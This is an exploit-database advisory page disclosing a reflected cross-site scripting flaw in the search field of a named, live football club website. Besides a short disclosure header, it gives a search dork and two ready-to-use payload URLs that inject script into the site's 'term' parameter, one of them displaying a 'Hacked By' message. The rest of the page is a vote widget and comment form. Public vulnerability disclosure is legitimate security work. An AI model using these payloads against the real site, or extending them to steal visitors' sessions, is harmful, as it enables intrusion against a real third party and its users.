Esteghlal F.C. Cross Site Scripting

2024.05.13

Credit: E1.Coders

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

EXPLOIT XSS Esteghlal F.C. (باشگاه فوتبال استقلال تهران) Site

https://fcesteghlal.ir   suffers from a remote XSS vulnerability.
This security incident was reported by the SOC and Maher team and prevention centers and was ignored
this site has not responded to their reports so we are posting this to add visibility to the issue.

###################################################################################################
# #
#   Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability.   #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link :   https://fcesteghlal.ir/   #
# #
# Security Risk : high #
# #
# Description : All sites coded and designed by novinvision #
# #
# DorK : fcesteghlal.ir/search?term= #
# #
###################################################################################################
# #
# Expl0iTs:   https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)>
#
#   https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script>

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Esteghlal F.C. Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.